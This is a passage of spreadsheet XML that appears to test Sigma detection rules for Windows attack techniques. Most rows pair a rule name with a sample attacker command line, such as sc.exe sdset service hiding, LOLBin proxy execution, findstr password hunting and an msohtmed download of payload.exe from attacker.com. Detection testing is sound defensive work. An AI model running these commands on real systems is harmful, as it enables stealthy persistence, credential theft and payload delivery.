      </c>
      <c r="I2105" s="43" t="n"/>
      <c r="J2105" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2105" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2106" ht="15.75" customHeight="1" s="42">
      <c r="A2106" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2106" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2106" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2106" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2106" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset AtomicService "D:(D;;LCCWDCWPCCSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F2106" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2106" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2106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106" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2106" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2107" ht="15.75" customHeight="1" s="42">
      <c r="A2107" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2107" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2107" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2107" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2107" s="4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2107" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2107" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2107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107" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2107" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2108" ht="15.75" customHeight="1" s="42">
      <c r="A2108" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2108" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2108" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2108" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2108" s="43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2108" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2108" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2108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108" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2108" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2109" ht="15.75" customHeight="1" s="42">
      <c r="A2109" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2109" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2109" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2109" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2109" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c sc.exe s^d^s^e^t AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F2109" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2109" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2109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109" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2109" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2110" ht="15.75" customHeight="1" s="42">
      <c r="A2110" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2110" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2110" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2110" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2110" s="43" t="inlineStr">
        <is>
          <t>sc.exe "sdset" scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F2110" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2110" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2110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2110" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K2110" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2111" ht="15.75" customHeight="1" s="42">
      <c r="A2111" s="43" t="n"/>
      <c r="B2111" s="43" t="n"/>
      <c r="C2111" s="43" t="n"/>
      <c r="D2111" s="43" t="n"/>
      <c r="E2111" s="43" t="n"/>
      <c r="F2111" s="43" t="n"/>
      <c r="G2111" s="43" t="n"/>
      <c r="H2111" s="43" t="n"/>
      <c r="I2111" s="43" t="n"/>
      <c r="J2111" s="43" t="n"/>
    </row>
    <row r="2112" ht="15.75" customHeight="1" s="42">
      <c r="A2112" s="43" t="n"/>
      <c r="B2112" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_citrix_trolleyexpress_procdump</t>
        </is>
      </c>
      <c r="C2112" s="36" t="inlineStr">
        <is>
          <t>Process Access via TrolleyExpress Exclusion</t>
        </is>
      </c>
      <c r="D2112" s="36" t="inlineStr">
        <is>
          <t>4c0aaedc-154c-4427-ada0-d80ef9c9deb6</t>
        </is>
      </c>
      <c r="E2112" s="43" t="n"/>
      <c r="F2112" s="43" t="n"/>
      <c r="G2112" s="43" t="n"/>
      <c r="H2112" s="43" t="n"/>
      <c r="I2112" s="43" t="n"/>
      <c r="J2112" s="43" t="n"/>
      <c r="K2112" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2113" ht="15.75" customHeight="1" s="42">
      <c r="A2113" s="43" t="n"/>
      <c r="B2113" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_createdump_lolbin_execution</t>
        </is>
      </c>
      <c r="C2113" s="36" t="inlineStr">
        <is>
          <t>CreateDump Process Dump</t>
        </is>
      </c>
      <c r="D2113" s="36" t="inlineStr">
        <is>
          <t>515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48</t>
        </is>
      </c>
      <c r="E2113" s="43" t="n"/>
      <c r="F2113" s="43" t="n"/>
      <c r="G2113" s="43" t="n"/>
      <c r="H2113" s="43" t="n"/>
      <c r="I2113" s="43" t="n"/>
      <c r="J2113" s="43" t="n"/>
      <c r="K2113" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2114" ht="15.75" customHeight="1" s="42">
      <c r="A2114" s="43" t="n"/>
      <c r="B2114" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_dumpminitool_execution</t>
        </is>
      </c>
      <c r="C2114" s="36" t="inlineStr">
        <is>
          <t>DumpMinitool Execution</t>
        </is>
      </c>
      <c r="D2114" s="36" t="inlineStr">
        <is>
          <t>dee0a7a3-f200-4112-a99b-952196d81e42</t>
        </is>
      </c>
      <c r="E2114" s="36" t="n"/>
      <c r="F2114" s="36" t="n"/>
      <c r="G2114" s="36" t="n"/>
      <c r="H2114" s="36" t="n"/>
      <c r="I2114" s="43" t="n"/>
      <c r="J2114" s="36" t="n"/>
      <c r="K2114" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2115" ht="15.75" customHeight="1" s="42">
      <c r="A2115" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2115" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C2115" s="43" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D2115" s="43" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E2115" s="43" t="inlineStr">
        <is>
          <t>AddInUtil.exe -AddInRoot:C:\\Users\\Public\\Payload</t>
        </is>
      </c>
      <c r="F2115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2115" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2115" s="43" t="n"/>
      <c r="J2115" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2115" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2116" ht="15.75" customHeight="1" s="42">
      <c r="A2116" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2116" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_addinutil_uncommon_cmdline</t>
        </is>
      </c>
      <c r="C2116" s="43" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution</t>
        </is>
      </c>
      <c r="D2116" s="43" t="inlineStr">
        <is>
          <t>4f2cd9b6-4a17-440f-bb2a-687abb65993a</t>
        </is>
      </c>
      <c r="E2116" s="43" t="inlineStr">
        <is>
          <t>AddInUtil.exe /AddInRoot:C:\\Users\\Public\\Payload</t>
        </is>
      </c>
      <c r="F2116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2116" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2116" s="43" t="n"/>
      <c r="J2116" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2116" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2117" ht="15.75" customHeight="1" s="42">
      <c r="A2117" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2117" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_potential_abuse</t>
        </is>
      </c>
      <c r="C2117" s="43" t="inlineStr">
        <is>
          <t>AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D2117" s="43" t="inlineStr">
        <is>
          <t>7efd2c8d-8b18-45b7-947d-adfe9ed04f61</t>
        </is>
      </c>
      <c r="E2117" s="43" t="inlineStr">
        <is>
          <t>copy powershell.exe AgentExecutor.exe &amp;&amp; AgentExecutor.exe -Command "Write-Output 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2117" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2117" s="43" t="n"/>
      <c r="J2117" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2117" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2118" ht="15.75" customHeight="1" s="42">
      <c r="A2118" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2118" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_potential_abuse</t>
        </is>
      </c>
      <c r="C2118" s="43" t="inlineStr">
        <is>
          <t>AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D2118" s="43" t="inlineStr">
        <is>
          <t>7efd2c8d-8b18-45b7-947d-adfe9ed04f61</t>
        </is>
      </c>
      <c r="E2118" s="43" t="inlineStr">
        <is>
          <t>AgentExecutor.exe -powershell script.ps1 C:\out.txt C:\err.txt C:\timeout.txt 60000 C:\Windows\System32\WindowsPowerShell\v1.0\ 0</t>
        </is>
      </c>
      <c r="F2118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2118" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2118" s="43" t="n"/>
      <c r="J2118" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2118" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2119" ht="15.75" customHeight="1" s="42">
      <c r="A2119" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2119" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C2119" s="43" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D2119" s="43" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E2119" s="43" t="inlineStr">
        <is>
          <t>dotnet-trace collect -- calc.exe</t>
        </is>
      </c>
      <c r="F2119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2119" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2119" s="43" t="n"/>
      <c r="J2119" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2119" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2120" ht="15.75" customHeight="1" s="42">
      <c r="A2120" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2120" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_password_spray</t>
        </is>
      </c>
      <c r="C2120" s="43" t="inlineStr">
        <is>
          <t>Potential Password Spraying Attempt Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D2120" s="43" t="inlineStr">
        <is>
          <t>bac9fb54-2da7-44e9-988f-11e9a5edbc0c</t>
        </is>
      </c>
      <c r="E2120" s="43" t="inlineStr">
        <is>
          <t>dsacls.exe /U:admin /P:Password123</t>
        </is>
      </c>
      <c r="F2120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2120" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2120" s="43" t="n"/>
      <c r="J2120" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2120" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2121" ht="15.75" customHeight="1" s="42">
      <c r="A2121" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2121" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2121" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2121" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2121" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| findstr /m .</t>
        </is>
      </c>
      <c r="F2121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2121" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2121" s="43" t="n"/>
      <c r="J2121" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2121" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2122" ht="15.75" customHeight="1" s="42">
      <c r="A2122" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2122" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2122" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2122" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2122" s="43" t="inlineStr">
        <is>
          <t>findstr /s/i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2122" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2122" s="43" t="n"/>
      <c r="J2122" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2122" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2123" ht="15.75" customHeight="1" s="42">
      <c r="A2123" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2123" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2123" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2123" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2123" s="43" t="inlineStr">
        <is>
          <t>findstr -s -i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2123" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2123" s="43" t="n"/>
      <c r="J2123" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2123" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2124" ht="15.75" customHeight="1" s="42">
      <c r="A2124" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2124" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2124" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2124" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2124" s="43" t="inlineStr">
        <is>
          <t>findstr -si "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2124" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2124" s="43" t="n"/>
      <c r="J2124" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2124" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2125" ht="15.75" customHeight="1" s="42">
      <c r="A2125" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2125" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2125" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2125" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2125" s="43" t="inlineStr">
        <is>
          <t>findstr /S /I "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2125" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2125" s="43" t="n"/>
      <c r="J2125" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2125" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2126" ht="15.75" customHeight="1" s="42">
      <c r="A2126" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2126" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2126" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2126" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2126" s="43" t="inlineStr">
        <is>
          <t>findstr.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2126" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2126" s="43" t="n"/>
      <c r="J2126" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2126" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2127" ht="15.75" customHeight="1" s="42">
      <c r="A2127" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2127" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C2127" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D2127" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E2127" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe -n1 calc.exe</t>
        </is>
      </c>
      <c r="F2127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2127" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2127" s="43" t="n"/>
      <c r="J2127" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2127" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2128" ht="15.75" customHeight="1" s="42">
      <c r="A2128" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2128" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C2128" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2128" s="43" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E2128" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe /c calc.exe &gt;nul 2&gt;&amp;1</t>
        </is>
      </c>
      <c r="F2128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2128" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2128" s="43" t="n"/>
      <c r="J2128" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2128" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2129" ht="15.75" customHeight="1" s="42">
      <c r="A2129" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2129" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_openwith</t>
        </is>
      </c>
      <c r="C2129" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2129" s="43" t="inlineStr">
        <is>
          <t>cec8e918-30f7-4e2d-9bfa-a59cc97ae60f</t>
        </is>
      </c>
      <c r="E2129" s="43" t="inlineStr">
        <is>
          <t>OpenWith.exe /c calc.exe | findstr .</t>
        </is>
      </c>
      <c r="F2129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2129" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2129" s="43" t="n"/>
      <c r="J2129" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2129" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2130" ht="15.75" customHeight="1" s="42">
      <c r="A2130" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_rasautou_dll_execution</t>
        </is>
      </c>
      <c r="C2130" s="43" t="inlineStr">
        <is>
          <t>DLL Execution via Rasautou.exe</t>
        </is>
      </c>
      <c r="D2130" s="43" t="inlineStr">
        <is>
          <t>cd3d1298-eb3b-476c-ac67-12847de55813</t>
        </is>
      </c>
      <c r="E2130" s="43" t="inlineStr">
        <is>
          <t>rasautou.exe -d test.dll -p DllMain</t>
        </is>
      </c>
      <c r="F2130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2130" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2130" s="43" t="n"/>
      <c r="J2130" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2130" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2131" ht="15.75" customHeight="1" s="42">
      <c r="A2131" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2131" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_execute_psh</t>
        </is>
      </c>
      <c r="C2131" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D2131" s="43" t="inlineStr">
        <is>
          <t>fbd7c32d-db2a-4418-b92c-566eb8911133</t>
        </is>
      </c>
      <c r="E2131" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer.exe "n;" -ex Bypass -File script.ps1</t>
        </is>
      </c>
      <c r="F2131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2131" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2131" s="43" t="n"/>
      <c r="J2131" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2131" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2132" ht="15.75" customHeight="1" s="42">
      <c r="A2132" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2132" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C2132" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D2132" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E2132" s="43" t="inlineStr">
        <is>
          <t>Start-Process mofcomp.exe -ArgumentList "C:\Windows\TEMP\evasion.mof"</t>
        </is>
      </c>
      <c r="F2132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2132" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2132" s="43" t="n"/>
      <c r="J2132" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2132" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2133" ht="15.75" customHeight="1" s="42">
      <c r="A2133" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2133" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C2133" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D2133" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E2133" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe "h"tt"p"://attacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F2133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2133" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2133" s="43" t="n"/>
      <c r="J2133" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2133" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2134" ht="15.75" customHeight="1" s="42">
      <c r="A2134" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2134" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C2134" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D2134" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E2134" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe payload.exe</t>
        </is>
      </c>
      <c r="F2134" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2134" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2134" s="43" t="n"/>
      <c r="J2134" s="43" t="n">
